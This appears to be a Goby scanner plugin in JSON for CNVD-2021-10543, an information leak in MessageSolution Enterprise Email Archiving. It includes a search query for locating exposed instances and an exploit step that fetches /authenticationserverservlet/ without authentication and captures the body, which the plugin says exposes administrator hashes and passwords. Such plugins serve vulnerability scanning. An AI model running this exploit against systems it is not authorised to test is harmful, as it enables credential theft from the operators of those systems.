Goby/json/MessageSolution_EEA_informa...

95 lines
3.8 KiB
JSON

{
"Name": "MessageSolution EEA information disclosure CNVD-2021-10543",
"Level": "1",
"Tags": [
"infoleak"
],
"GobyQuery": "title=\"MessageSolution Enterprise Email Archiving (EEA)\"",
"Description": "Message solution enterprise e-mail archiving management system EEA is an e-mail archiving system developed by Beijing Yixun Sida Technology Development Co., Ltd.",
"Product": "MessageSolution EEA",
"Homepage": "http://www.messagesolution.cn/",
"Author": "",
"Impact": "Message solution enterprise e-mail archiving management system EEA is an e-mail archiving system developed by Beijing Yixun Sida Technology Development Co., Ltd. There is a general web information leakage in the system, such as the windows server administrator hash and web account password.",
"Recommendation": "",
"References": [
"https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543"
],
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/authenticationserverservlet/",
"follow_redirect": false,
"header": null,
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "administrator",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/authenticationserverservlet/",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "administrator",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|undefined|undefined"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}